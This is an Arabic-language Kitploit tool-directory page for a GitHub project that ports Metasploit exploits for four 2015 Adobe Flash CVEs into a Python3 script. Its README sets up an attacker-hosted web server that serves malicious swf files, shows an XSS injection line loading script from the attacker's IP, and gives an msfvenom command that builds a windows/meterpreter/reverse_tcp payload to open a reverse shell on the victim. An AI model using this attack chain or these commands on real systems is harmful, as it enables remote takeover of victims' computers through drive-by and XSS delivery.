Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Adobe-Flash-Exploits_17-18 — تم تحويل استغلالات Metasploit لثغرات Adobe Flash التالية: CVE-2015-3090 وCVE-2015-3105 وCVE-2015-5119 وCVE-2015-5122 إلى سكربت Python3. | Kitploit
أدوات/GitHubGitHub/xattam1/adobe-flash-exploits_17-18
أطر الاستغلالتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubxattam1/adobe-flash-exploits_17-18

Adobe-Flash-Exploits_17-18

تم تحويل استغلالات Metasploit لثغرات Adobe Flash التالية: CVE-2015-3090 وCVE-2015-3105 وCVE-2015-5119 وCVE-2015-5122 إلى سكربت Python3.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 4 سنواتلم تتم المراجعة بعد

سكربت Python3 لاستغلالات Adobe Flash CVE-2015-3090 و CVE-2015-3105 و CVE-2015-5119 و CVE-2015-5122

تم تحويل استغلالات Metasploit الخاصة بثغرات Adobe Flash CVE-2015-3090 و CVE-2015-3105 و CVE-2015-5119 و CVE-2015-5122 إلى سكربت Python3.

معلومات

سيستضيف هذا السكربت خادم ويب يمكنه استغلال واحدة من ثغرات Adobe Flash التالية في كل مرة:

  1. CVE-2015-3090
  2. CVE-2015-3105
  3. CVE-2015-5119
  4. CVE-2015-5122

التنفيذ

يجب عليك إجراء تغييرات (موضحة هنا) على exploit.py لتناسب احتياجاتك.

التعديلات

  • hostname = "192.168.1.100"
    • هذا عنوان IP على نظام المهاجم الذي سيستضيف خادم الويب الخاص بالاستغلال.
  • serverPort = 8080
    • هذا هو المنفذ على نظام المهاجم الذي سيستضيف خادم الويب الخاص بالاستغلال.
  • xss = False
    • إذا تم تعيينه إلى True، فسيتم التعامل مع أول طلب من الضحية إلى الخادم على أنه JavaScript:
      • مثال على حقن XSS:
        • <script src="http://192.168.1.100:8080/"></script>
      • مسار الهجوم:
        • طلب الضحية 1 -> خادم عرضة لـ XSS:
          • يصل الضحية إلى حقن XSS على خادم بعيد يطلب ملف JavaScript (انظر الطلب 2).
        • طلب الضحية 2 -> مصدر JavaScript على نظام المهاجم.
        • طلب الضحية 3 -> ملف swf خبيث.
    • إذا تم تعيينه إلى False، فسيتم التعامل مع أول طلب من الضحية إلى الخادم على أنه HTML:
      • مثال:
        • http://192.168.1.100:8080/
      • مسار الهجوم:
        • طلب الضحية 1 -> ملف HTML على نظام المهاجم.
        • طلب الضحية 2 -> ملف swf خبيث.
  • base64Payload = "..."
    • هذه هي الحمولة base64 التي سيتم تنفيذها على نظام الضحية.
    • عدّل الأمر في المثال أدناه بما يناسب احتياجاتك وأنشئ حمولتك الخاصة:
      • مثال:
        • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64
      • ملاحظة: الحمولة الوحيدة التي نجحت معي هي windows/meterpreter/reverse_tcp.

  • swfFile = swfFileList['37368']
    • اختر ملف swf الخاص باستغلال Adobe Flash لاستخدامه في استغلال نظام الضحية:
      • root@kitploit:~
        swfFileList = {
            '37368': 'CVE-2015-3090.swf',
            '37448': 'CVE-2015-3105.swf',
            '37523': 'CVE-2015-5119.swf',
            '37599': 'CVE-2015-5122.swf'
        }
        

التشغيل

شغّل الأمر التالي، في نفس الدليل الذي توجد فيه ملفات swf الخبيثة، لتنفيذ سكربت استغلال Adobe Flash:

  • python3 exploit.py

المراجع:

CVE-2015-3090 -> https://exploit-db.com/exploits/37368

CVE-2015-3105 -> https://exploit-db.com/exploits/37448

CVE-2015-5119 -> https://exploit-db.com/exploits/37523

CVE-2015-5122 -> https://exploit-db.com/exploits/37599

تنزيل الأداة